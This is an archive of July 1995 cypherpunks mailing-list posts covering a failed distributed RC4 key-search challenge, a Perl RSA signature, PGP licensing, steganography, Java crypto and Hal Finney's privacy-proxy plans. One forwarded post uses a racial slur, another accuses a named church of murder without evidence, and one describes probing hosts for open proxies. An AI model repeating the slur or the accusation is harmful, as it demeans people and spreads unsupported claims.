28.0 bits (0.024%) Ollivier Robert <roberto@keltia.freenix.fr>
28.0 bits (0.024%) Lucky Green <shamrock@netcom.com>
28.0 bits (0.024%) L Futplex McCarthy <futplex@pseudonym.com>
28.0 bits (0.024%) Jeff Licquia <jalicqui@prairienet.org>
28.0 bits (0.024%) J Francois <frenchie@magus.dgsys.com>
28.0 bits (0.024%) Brian LaMacchia <bal@mit.edu>
28.0 bits (0.024%) Andy Brown <a.brown@nexor.co.uk>
28.0 bits (0.024%) Adam Morrison <adam@math.tau.ac.il>
28.0 bits (0.024%) <mikew@nersc.gov>
----------------------------------------------------------------------
40.0 bits (100.000%) 89 cpunks + x * anonners in 1 weeks compute


Report is on the brute-rc4.html page also:

	http://dcs.ex.ac.uk/~aba/brute-rc4.html


Problems.
---------

But, briefly these are the things which may be responsible for the
failure to find a key:

a) We weren't sure if we had a known plaintext / ciphertext pair

   This due to lack of Microsoft Access specs, this was known from 
   the begining, but we thought we'd try it and see.

b) Eeek! There was a bug in bruterc4.c for some time which affected
   Alphas, and possibly other BSD machines.  This meant keyspace 
   wasn't being searched when the -v option was used.

c) Some people reported that their browser / uuencode software
   combination meant that cutting and pasting of the uuencode plain
   text and cipher text files was silently failing due to extra spaces
   inserted by a flawed pasting operation.

d) Human error - it is possible that some keys were unswept - by 
   accident.

e) Malicious humans - we don't know, but think this was not a problem.


Solutions.
----------

Proposed solutions for future brute forcing efforts (such as the
upcoming SSL effort), for respective points above:


a) Need better spec of MA, or more experimentation / reverse
   engineering.

   For SSL this is not a problem as the SSL specs are openly available
   and very detailed.

b) Write bug free software :-)  Test more rigourously on multiple unixs
   and architectures with a brief test run.

c) Use hex numbers in a config file.  Ie don't use uuencode on web page.

d) We're going to have the programs (bruteRC4.c and bruteSSL.c) produce
   a checksum on completion.  Acknowledgements of swept keyspace must be
   with checksum.  Crude check to reduce chances of mistyped big hex nums.
   
   Represent the key space as a 4 digit hex number like this: 1a23, in
   terms of 24 bit keyspaces, and represent keyspace to sweep in terms
   of numbers of those, lots of people had difficulty reasoning in log
   base2 for bits.

e) Do nothing yet.  If we get lots of compute and it proves to be a
   problem perhaps implement some redundancy into the system.


Coming soon brute force attempt on Hal Finney's brute of 40+88bit SSL.
Watch this space, several cypherpunks are hard at work optimising
their bruteSSL.c code, and also writing farming software via a system
of servers connected via sockets.  The WWW page doler will still be
available for those with out direct IP.

Hal Finney's SSL challenge is here:

	http://www.portal.com/~hfinney/sslchal.html

More on SSL later, but we hoped to give the SSL one a wider announce
in sci.crypt, and see how *fast* we can brute 40 bit keyspace.

Hope to see your compute in the brute SSL effort when it is announced,

Adam
--
HAVE *YOU* EXPORTED A CRYPTO SYSTEM TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------------8<-------------------------------------
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-------------------------------------8<-------------------------------------
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: H Keith Henson <hkhenson@shell.portal.com>
Date: Wed, 19 Jul 95 17:05:24 PDT
To: sandfort@crl.com
Subject: Re: cypherpunk "Zen" victories
Message-ID: <199507200244.TAA14857@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



> 4) only *one* address was compromised on Julf's system. a small price
> to pay for all this    

Just for what it is worth, there has been considerable speculation as
to the fate of -AB-, whoes real login was tc@alumni.caltech.edu.  The
real world name was supplied by Caltech to the LAPD who, it seems, 
turned it over to the scientologists.  Caltech has been trying to 
contact this person for some time now, after being presented with a
very irregular written request to turn the backup tapes on this act
over to the CoS reps.  CoS upper management has long showed the 
willingness to kill (as exposed by affidavits) but has failed in the
"execution" phase.  It really makes me wonder if they managed it
this time.  Keith Henson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 19 Jul 95 20:24:58 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <v02120d2cac338abe35db@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>Integration of crypto into Netscape is thus the Big Win.
>

This is why Amanda and I have been working on crypto tools
for Java, a "safe" programming language that will be embedded
in Netscape in the (hopefully) not-too-distant future. In
addition to eventual incorporation in Netscape, it is currently
available on Suns running Solaris 2.4 and PCs running Windows NT.

See: http://www.cs.utexas.edu/users/achou/JCrypt/packages.html

This is also why October is "Java month" for the cypherpunks
Bay Area meeting. Marianne Mueller (mrm@eng.sun.com) is
organizing speakers and coordinating the schedule for that
month's meeting.

Java will be available for Windows 95 about the time Win 95 is
released, and a Mac version is due out "Real Soon Now." The
Mac version has been demoed to industry insiders already. One
of the obvious advantages is that it should be possible to
write a nice, GUI interface once, and be done with all of the
tiresome porting that seems to occupy too much of our time.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Wed, 19 Jul 95 17:19:14 PDT
To: mfroomki@umiami.ir.miami.edu
Subject: Re: 9th Amendment References
In-Reply-To: <2561@umlaw.demon.co.uk>
Message-ID: <199507200025.UAA02138@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

> As my final word on this thread, let me say that if you are really
> interested in the 9th Amendment, by far the best legal article on 
> the subject  that I know of is Charles L. Black, Jr, On Reading 
> and Using the Ninth Amendment.

You need LEXIS to look this up? Must have been published in one of
those legal journals that only the priests of the black robe are
allowed to subscribe to. :)

May I recommend Bennett B. Patterson: _The Forgotten Ninth Amendment: A Call
for Legislative and Judicial Recognition of Rights Under Social Conditions of
Today_. Originally published in 1955 by Bobbs-Merrill of Indianapolis and
authored by a member of the Texas Bar. Supposedly long out of print, the
master plates are rumored to have been destroyed. A reprinted edition was
being made available recently as part of a "9th Amendment Legal Defense Kit"
that a man named Conrad LeBeau was selling a few years ago (by all reports,
he was fighting the FDA with marginal success, since FDA jurisdiction is a
matter of contract law). At last report, you could reach Conrad at: Health
Freedom Reporter, PO Box 272, Hales Corner, WI, USA.

Another good one is Randy Barnett's _The Rights Retained by the People: The
History and Meaning of the Ninth Amendment_. The Web link at Book Stacks is:

http://melville.books.com/scripts/view.exe?sid~cMLVLlgYLKcBX4f/ISBN~0913969443

-- 

 http://yakko.cs.wmich.edu/~frogfarm      |          PGP signed mail preferred
"On a superhighway existing roads are destroyed, it's easy to monitor traffic,
you can't make your on-ramp, politics controls development and they arrest you
if you go too fast, travel in your own direction or use unapproved technology."
 - kpc@ptolemy.arc.nasa.gov               |              Freedom...yeah, right.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Wed, 19 Jul 95 14:20:36 PDT
To: eff-austin-directors@zilker.com (EFF austin board of directors)
Subject: Why no action alert, coalition opposing S. 974?
Message-ID: <300d66d0.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have read the EFF analysis of Senate bill 974, which is designed to
inhibit encryption on Networks. I think that it is a thoughtful document
but I am concerned that there has been no action alert produced to tell
people the most effective way to oppose this horrible Bill. People
who are concerned about the bill need to know what Senators could most
profitably be contacted. Also why has no coalition been formed to oppose
this bill? I am aware that many people are busy opposing S314, but
S974 is equally terrible as it attempts to suppress free expression.

I could try to produce an action alert myself, but I would probably make
errors as I am not up on the legal subtleties and the intricacies of
Congress. Could some of the savvy people please write an action alert?
Otherwise I will be forced to take a stab at it.

- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMA10YfBUQYbUhJh5AQFMBAQAgUJAj1nNdG54IxIFAboCw+Q/E8WWOvEO
9Aazj9hjHK7VeHi+vpTY7eJRbQq7LyQq/ex41PE+QXu+mjWe3c1si8HmhherA22i
CUGv3UI8L/Z43zLtN2TI9reJsizeYnmHlO3uUffP3vnhwBJm1G7EAlXvKFqikC90
q1DUqqgq7k4=
=4yQ7
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: corbeau@seanet.com
Date: Wed, 19 Jul 95 21:58:07 PDT
To: cypherpunks@toad.com
Subject: FWD:Speaker needed
Message-ID: <Pine.NXT.3.91.950719215606.12612A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


>Sender: html-authors-guild-owner@lists.Stanford.EDU
>Status:   
>
>Two topics to this post:
>
>1.  I have been asked to speak at an Internet/WWW conference that will be
>held in Charlotte, NC on October 23rd.  Is the SC gonna jump on me for
>mentioning my membership in the Guild in the bio that they will print in the
>advertising flyers? <g>
>
>2.  I have been contacted by the producer of the conference and asked to
>contact the Guild for help in finding an Internet Security Guru to speak at
>the conference... If interested, point of contact is:
>
>rstoker@accunet.com
>
>
>I will be posting more info (costs, location, times, etc.) as they come 
to me.
>
>BTW: Speaking of security, I have asked a question that has gone unanswered
>(possibly due to being sidetracked by flamewars & whatnot)... anyone out
>there know how to set up password security on pages running off
>MacHTTP/WebStar servers?  Any help is appreciated!
>
>TIA
>
>  -AL GORDON
>   ProEMail Internet Services
****************************

Thot one o' y'all might fit this bill...

-corbeau





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Wed, 19 Jul 95 20:37:06 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Stego Standards Silly
Message-ID: <8AD8535.00030001EC.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


LM> I think I need to clarify my threat model. I'm positing a scenario in which
LM> transmission of ciphertext and stegoed anything is illegal, but transmission
LM> and use of "conspicuous" digital signatures is legal. Furthermore, the govt.
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  Ah.  No big deal then.  After stegoing, you sign the GIF.

LM> sanitizes the LSBs of digital images for our protection, perhaps distorting
LM> a mean of X% of the LSBs of a mean of Y% of transmitted images. Out-of-stego-
LM> channel checksummation would IMHO be crucial in such a situation.

  Sending multiple copies of the same GIF would go a long way toward
solving this, if X% and Y% were low enough. Say I get 5 copies, and
reconstruct the origial via a "voting" protocol. Also, if we break down
the file into smaller blocks, and sign each block individually, we can
narrow down the errors.

  But I am having a real problem with an overt policy of fiddling with
people's mail. If they did that, it would likely cause a huge backlash
that would be felt at the ballot box.



 *    
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jon cameron <cellf@free.org>
Date: Wed, 19 Jul 95 20:20:09 PDT
To: cypherpunks@toad.com
Subject: PS/2 passwd bypassed at bootup?
Message-ID: <Pine.BSD.3.91.950719221913.1286A-100000@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


I know that removing the battery in a PS/2 "disengages" the password.
But can it be disengaged if a person has an administration-type of 
diagnostic/setup/boot-up floppy?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim werner <werner@mc.ab.com>
Date: Wed, 19 Jul 95 16:53:32 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <9507200230.AA05467@mondo.ab.com>
MIME-Version: 1.0
Content-Type: text/plain


>From stewarts@ix.netcom.com  Tue Jul 18 02:51:50 1995
>Date: Mon, 17 Jul 1995 23:52:35 -0700

>At 09:07 PM 7/17/95 -0400, tim werner wrote:
>>>... I was talking to one of the sys admins at
>>>A-B, and he said that we weren't allowed to use PGP to encrypt our mail,
>>>because Viacrypt owned the commercial rights.

>Actually, it's less clear than that.

>Selling software containing the code is pretty clearly commercial.
>Non-commercial messages from your personal non-business machine are
>clearly non-commercial.  Providing a service of encrypting and decrypting
>messages for people for money sounds like it's _very_ probably commercial.
>Encrypting and decrypting messages to/from your business that deal with money
>are a very gray area.

Maybe "commercial company" is the wrong expression.  All I meant was
that my company is not non-profit, or a university, or a government
organization.  It is an engineering firm.  What I have in mind is
nothing to do with a commercial use of encryption per se. 

If they decided to put encryption into a product, that would be
something else entirely.  I doubt they would ever be using it to accept
payment for the stuff they sell, although I don't really know much about
the marketing aspect of the business.

Basically, I have two potential uses for it:

1) I have some email pen-pals that I would like to be able to use PGP to
   talk with.  All my other accounts (freenet, school) have mail
   forwarded to what I think of as my email "home address", which is my
   work address.  I would like to use that work account to process my
   email.  Is it legal to use PGP 2.6.2 for this purpose?  I'd also like
   to be able to tell fellow workers that they can use it, and show them
   how. 

2) It's entirely likely that people within the company may wish to get
   into the habit of transmitting company data in encrypted form.  This
   is not a question of incorporating the encryption technology into a
   product, or even into the sale of a product -- it's just a question
   of keeping intra-company information transfers private.


The first is the one I'm really concerned with.  The second would be
sort of a natural extension that, if legal, would be nice.  I can't
imagine that these uses are subject to the ViaCrypt license, but I need
some reassurance/ammunition in order to be a little more open about
getting it installed on the machines in my department.


thanks,
tw

-- 

Well, Bust My Britches!  Eggs Almondine and a Bottle of Beaujolais!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Wed, 19 Jul 95 19:07:37 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: Stego-Rants ?
In-Reply-To: <ac327d250c021004491e@[205.199.118.202]>
Message-ID: <Pine.3.89.9507192123.A5264-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 19 Jul 1995, Timothy C. May wrote:

> At 7:57 AM 7/19/95, Douglas B. Renner wrote:
[snip]
> >I'd conjecture that it's possible.  Imagine fractal compression of a text
> >file, with the decompression routine adding some "randomness" which would
> >be your message, obscured at a very abstract level.  Depending on how
> >much "randomness" was added, I'm wondering if the resulting text might
> >possibly retain some of its original legibility (?)  ...
[snip]
> >(I am looking at an ad for a graphics program, "Images Incorporated" by
> >Iterated Systems which with fractal techniques can achieve 100:1
> >compression -- and then -- decompress to 8 times the original bitmap size
> >with minimal added distortion.)
> 
> But fractal compression schemes are usually _lossy_, that is, some of the
> original bits are irretrievably lost. (This should be clear also from the
> amount of compression achieved....multiple files/images compress to the
> "same" smaller file--by the "pigeonhold principle.")
> 
> Lossy compression is often OK for visual images and audible files, a la
> music, but would be pretty bad for any scheme dependent on encryption.
> 

Yes; however It's not so much the compression ratio I was concerned with 
other than that it demonstrates the level of abstraction achieved in the 
analysis.  For crypto we wouldn't really mind if the intermediate fractal 
file were actually larger than the original and I assume that these 
techniques can be lossless if we are willing to accept this tradeoff.

What I think is remarkable about the example of compression and
enlargement is that with the process of enlargement, image *detail* is 
added in a manner consistent with the original.  (!!!)  By altering the 
decompression with a hidden message one would of course be, replacing 
or adding information, and if the goal were to have this new information 
"blend in" with its container, then perhaps we could learn from fractal 
compression. 

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 19 Jul 95 22:53:50 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
In-Reply-To: <v02120d2cac338abe35db@[199.2.22.120]>
Message-ID: <199507200552.WAA09896@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I also agree that Netscape and similar browsers are a good target for
crypto applications.  I am working on a program (tentatively called
webcloak) which runs on your PC next to your browser.  You set the
proxy in the browser to point at this program.  This is a dialog box in
Netscape and I think most browsers have this support.  Then all of your
communications go through this program.

Unfortunately progress has been slow as I have been having to learn
Winsock programming and re-learn Windows programming.  But I do have a
dummy program working which will pass commands through.  It does not
encrypt anything yet but simply redirects commands to a web proxy running on
the net.  Soon I will work on adding encryption, but the next step is to
add dialog boxes to choose the web proxy to use.  Right now it is hard
coded in.

Someone posted recently that the formerly open web proxy at
http://www.proxy.aol.com:80/ is no longer responding.  Also, a list
member was running one for a while at http://spirit.aud.alcatel.com:8082/
but that is no longer working either.  I have been looking for proxies by
searching the incoming connection logs on this commercial system.  I
figure that some of the more frequently appearing hosts may be proxies.
I telnet to them on port 80 and type "GET http://sony.com/".  This is
just a URL I use because it is short.  Usually nothing happens but I have
found a couple of proxies that still work.  At this point I don't want to
publicize them because they might be shut down as a result.

I think running open web proxies (and another kind of proxy I will
describe in a future message) will be a good thing for Cypherpunks to do.
I know not everyone can do it; it takes more privileges and clout to keep
a server running than to drop in a mail filter.  But for those who do
have the ability to leave background processes running I think these will
be the remailers of the future.  I hope some list members will start
doing this.

As another solution, I have developed a Perl script which anyone who can
run CGI scripts can use to become a web proxy.  Fortunately (and somewhat
mysteriously) this commercial system lets me do that.  Basically if you
want to connect to http://www.mcom.com/ you instead connect to
http://www.portal.com/~hfinney/webcloak.cgi?http://www.mcom.com/.  The
name of the CGI script and "?" is prepended to the desired URL.  The
script then receives the part after the "?" as its argv so it opens the
URL and passes it back.  So if you can't run a server but can install CGI
scripts then you can run this "poor man's proxy".

Unfortunately the standard proxy protocol will not work transparently
with this; the CGI script and "?" pasting isn't done automatically by
browsers.  However my PC "webcloak" program does work with this kind of
proxy; it pastes the required prefix string at the front of each URL.  So
if people do start using this approach the CGI proxies may be part of the
solution.

Soon I hope to be far enough along to ask people to start testing some of
this software.  Once I get the webcloak program able to be reconfigured
by the end user I'll ask people to try it to see if it works on anybody
else's PC than mine.  It should hopefully work with anything that uses
Winsock.

Eventually I hope to see a lot of people running web proxies and privacy
proxies (which just pass requests through to other web and privacy
proxies - these are very simple connection redirectors, but do encryption
and decryption for privacy).  The end user can connect to a web site and
update his list of proxy servers.  Then when he fires up his local proxy
interface program it can ping the various servers and print a summary of
their response times.  He clicks on the ones he wants, setting up a
chain.  Only the last one in the chain needs to be capable of proxying
http requests, the others just pass data through.

The local program connects to each of the proxies and negotiates a
session key using PK encryption.  This will be cached and used over a
moderately extensive period of time, at least a few minutes.  We can't
possibly do a PK decryption for each link in a proxy for every .gif file
in a page.  That would be too slow.  So instead it will just send a cache
identifier to indicate which encryption key is in use.

This is all pretty ambitious as you can see, but I am trying to do it
incrementally.  Even a basic system without encryption and where the user
has to edit a text file to choose his proxy chain will provide some
privacy protection.  So I hope I will be able to interest people in
providing the infrastructure needed for privacy protection on the Web.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMA3umxnMLJtOy9MBAQHpSQIAvI/YB9JmGgwIaFWxCegAUtZ94eIHvOFU
wVQPdXlvaLup8Kjcx1wTPm/oib8u7Ema+6eb/MGsQWrnYtCO8emoew==
=zx5U
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hshubs@BIX.com
Date: Wed, 19 Jul 95 20:13:44 PDT
To: jmm0021@alamo.net
Subject: RE: There is a God
In-Reply-To: <2yc78c1w165w@alamo.net>
Message-ID: <9507192311.memo.13425@BIX.com>
MIME-Version: 1.0
Content-Type: text/plain


Where was this reported, please?

-------- Original Message --------

Return-path: <owner-cypherpunks@toad.com>
Received: from delphi.com by bix.com (CoSy3.31.1.50) id
 <9507130936.memo.90466@BIX.com>; Thu, 13 Jul 1995 09:36:37 -0400 (EDT)
Received: from relay4.UU.NET by delphi.com (PMDF V4.3-9 #10880)
 id <01HSTF2JAFE899G4G7@delphi.com>; Thu, 13 Jul 1995 09:34:42 -0400 (EDT)
Received: from toad.com by relay4.UU.NET with SMTP id QQyyfe10461; Thu,
 13 Jul 1995 09:30:32 -0400
Received: by toad.com id AA14137; Thu, 13 Jul 95 06:09:07 PDT
Received: from news1.crl.com by toad.com id AA14131; Thu, 13 Jul 95 06:09:02 PDT
Received: from alamo.net by news1.crl.com with UUCP id AA02826
 (5.65c/IDA-1.502 for cypherpunks@toad.com); Thu, 13 Jul 1995 05:50:46 -0700
Received: (from waffle@localhost) by ephsa.alamo.net (8.6.10/8.6.10)
 with UUCP id GAA12500 for cypherpunks@toad.com; Thu, 13 Jul 1995 06:18:35 -0500
From: jmm0021@alamo.net (Jason Montgomery)
Date: Thu, 13 Jul 1995 06:12:12 -0500 (CDT)
To: cypherpunks@toad.com
Message-id: <2yc78c1w165w@alamo.net>
Subject: There is a God
Sender: owner-cypherpunks@toad.com
Content-transfer-encoding: 7BIT
Organization: ALAMO Internet  --  San Antonio, Texas
X-Envelope-to: bix.com!hshubs
Precedence: bulk

On ABC's latenight news program I just saw a story that renewed my faith 
that there is a God and he is brown.  It seems that the Alabama Milita 
was able to film a ATF event that was truly horrifing to behold.  Nigger 
Hunging Licenses and the works.  Well our friends in Alabama gave the 
tapes to ABC and the story was blown wide open.  Our friends from Alabama 
in the pursuit of the ATF did the world a great service and completely 
restored my faith in America.

Jason Montgomery

ps.  The spelling errors are all mine its 6 in the morning and im out of 
caffine.

----------------------------------------------------------------
Jason Montgomery                            
jmm0021@alamo.net                           
----------------------------------------------------------------
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Wed, 19 Jul 95 23:13:55 PDT
To: Douglas Barnes <cman@communities.com>
Subject: Re: Netscape the Big Win
In-Reply-To: <v02120d2cac338abe35db@[199.2.22.120]>
Message-ID: <Pine.3.89.9507200057.M2934-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Jul 1995, Douglas Barnes wrote:

> Java will be available for Windows 95 about the time Win 95 is
> released, and a Mac version is due out "Real Soon Now." The
> Mac version has been demoed to industry insiders already. One
> of the obvious advantages is that it should be possible to
> write a nice, GUI interface once, and be done with all of the
> tiresome porting that seems to occupy too much of our time.

I assume that there is a version available for UNIX, yes?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 20 Jul 95 00:39:04 PDT
To: tim werner <werner@mc.ab.com>
Subject: Re: Is it legal for commercial companies to use PGP?
Message-ID: <199507200736.AAA05001@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 7/19/95 -0400, tim werner wrote:
>>From stewarts@ix.netcom.com  Tue Jul 18 02:51:50 1995
>>Selling software containing the code is pretty clearly commercial.
>>Non-commercial messages from your personal non-business machine are
>>clearly non-commercial.  Providing a service of encrypting and decrypting
>>messages for people for money sounds like it's _very_ probably commercial.
>>Encrypting and decrypting messages to/from your business that deal with money
>>are a very gray area.
>
>Maybe "commercial company" is the wrong expression.  All I meant was
>that my company is not non-profit, or a university, or a government
>organization.  It is an engineering firm.  What I have in mind is
>nothing to do with a commercial use of encryption per se. 

That's what I thought you meant.



>1) I have some email pen-pals that I would like to be able to use PGP to

That would be fine to use PGP 2.6.2 for; there's realky no question.

>2) It's entirely likely that people within the company may wish to get
>   into the habit of transmitting company data in encrypted form.  This
>   is not a question of incorporating the encryption technology into a
>   product, or even into the sale of a product -- it's just a question
>   of keeping intra-company information transfers private.
>The first is the one I'm really concerned with.  The second would be
>sort of a natural extension that, if legal, would be nice.  I can't
>imagine that these uses are subject to the ViaCrypt license, but I need
>some reassurance/ammunition in order to be a little more open about
>getting it installed on the machines in my department.

The ViaCrypt license only matters if you're using ViaCrypt.
The question of whether you can use PGP 2.6.2 for these is something
you _do_ need to read the RSAREF license about, and maybe ask
Jim Bidzos <jim@rsa.com> or a company lawyer-type about;
encrypted mail within the company is probably ok, encrypted mail sending
credit card numbers to pay for stuff is more questionable.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 20 Jul 95 00:38:42 PDT
To: "Robert A. Hayden" <cypherpunks@toad.com>
Subject: Re: "Hey Phil! Stop telling people *not* to use PGP!"
Message-ID: <199507200737.AAA05005@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:00 PM 7/19/95 -0500, Robert A. Hayden wrote:
>> I am fond of saying that we PGP enthusiasts have two choices ahead of us
>> within a couple of years:  either 5,000 enthusiasts using PGP with
>> MAXIMAL SECURITY at all times, or 5,000 enthusiasts with MAXIMAL
>> SECURITY and 10,000,000 computer-illiterate e-mail users using PGP with
>> push-button interfaces and multi-user remote systems.

>I said it last week, and I'll say it again.  From a sociological
>standpoint, it's those 10,000,000 computer-illiterate e-mail users that we
>need to focus all of our efforts towards.  Those 5,000 literate people we 
>really don't have to care about.

But there are two different classes of issues here - the convenience-only
issues,
which can be fixed with bells and whistles and GUIs and
audio-enhanced-RTFM-buttons,
and the security-related issues.  For security, there are three classes of
users:
        1 - folks with standalone systems and dial-up mail - no problem
                This is a _lot_ of users - AOL, Compuserve, etc.
        2 - folks with single-user systems on networks - they need to make
                sure they've got PGP installed right (relatively easy,
                with local disks, but fancy install widgets may help), 
                but beyond that they've got to know that PGP is only as
secure as
                their machine and network configuration.  Mostly ok,
                and to the extent it's not, they've got other serious problems.
                This is also a lot of users.
        3 - folks with shared machines - these folks (mostly Unix users and
                college students, plus people who have web-space they need
                to telnet to, like me) do need to know their limitations,
                and currently have the most problems with convenience,
                having to haul files back to a secure machine to encrypt
securely.

                The first step is education - manuals that say "Don't Panic
                Unless You Need To Be Paranoid" instead of "Panic Immediately",
                that can make them aware of the risks and tradeoffs.  It's about
                two pages of well-written stuff, if someone wants to write it.
                The next step is either building convenient tools to help
                them with encryption, or building convenient installation
scripts
                for the tools that already exist (e.g. mail, or scriptable
                terminal emulators which can automate a lot of the hauling
around.)

The big payoffs are for groups 1 and 2, but a lot of the technically savvy
people
who read manuals and have to convince system administrators to install stuff
are in group 3.  So this is basically a writing job, plus talking the PGP 3.0
people and maybe Phil into including the discussion with the manuals.
Remailers, btw, are in this class, since they need to leave their
passphrases out
in relatively unprotected shell scripts.

I used to run PGP on a diskless workstation (at least I was one
of the people with the root password :-), but I was aware of the risks.
I'm now using it both on my Netcom+Eudora+PrivateIdaho system and on the
machine where I have web space, which I have to telnet to across Netcom.
I take care of the trust problem there by using a short key with a big ugly
"untrustable" string in the user name, and using S/Key to log in;
if I had an encrypted telnet to run on both ends I'd probably want to use it,
so I'm watching the Stel and other new stuff coming out.

                                    Bill Stewart


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: You can get PGP by anonymous ftp from ftp.ox.ac.uk

iQBVAwUBMA4HvfthU5e7emAFAQFrMwH9Hh1oYQKvsuV/IyVUskv2aZbmuh8fXQgK
XpSpucrJV27tlFbjIDVqmapMR77arZVOm2Hs0/NTB2uT2jDG1r5+Lw==
=fRtS
-----END PGP SIGNATURE-----
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Wed, 19 Jul 95 21:56:21 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Stego Standards Silly
In-Reply-To: <8AD8535.00030001EC.uuout@famend.com>
Message-ID: <9507200456.AA17771@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I suggested a scenario in which:
>>> use of "conspicuous" digital signatures is legal

Monty Harder writes:
>   Ah.  No big deal then.  After stegoing, you sign the GIF.

Yes, that was exactly the point I made in my previous message.

>   But I am having a real problem with an overt policy of fiddling with
> people's mail. If they did that, it would likely cause a huge backlash
> that would be felt at the ballot box.

I'm not so sure. (Yes, I'm very cynical about humans -- more than most people
on the list, I think.)  Everybody and her sister has been bombarding the
firewalls list lately, asking about virus scanners and such. IMHO a *lot* of
folks would be quite content to have somebody filter their mail "for viruses,
harassment, etc."  I hope I'm wrong....

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 20 Jul 95 00:05:43 PDT
To: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Subject: Re: Netscape the Big Win
In-Reply-To: <Pine.3.89.9507200057.M2934-0100000@khijol>
Message-ID: <199507200705.DAA15320@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I assume that there is a version available for UNIX, yes?

It was originally released for Solaris 2.X machines, and it is
currently being ported to a lot of other platforms.  The major problem
is that it requires a lot of threads support, which makes it difficult
to port.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 20 Jul 95 00:25:40 PDT
To: The Gate <gate@id.wing.net>
Subject: Re: Investigate Your Federal Building :)
In-Reply-To: <Pine.3.89.9507191717.A8562-0100000@dialin1.wing.net>
Message-ID: <9507200725.AA11960@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



What pray tell, does thsi have to do with cypherpunks?

The Gate writes:
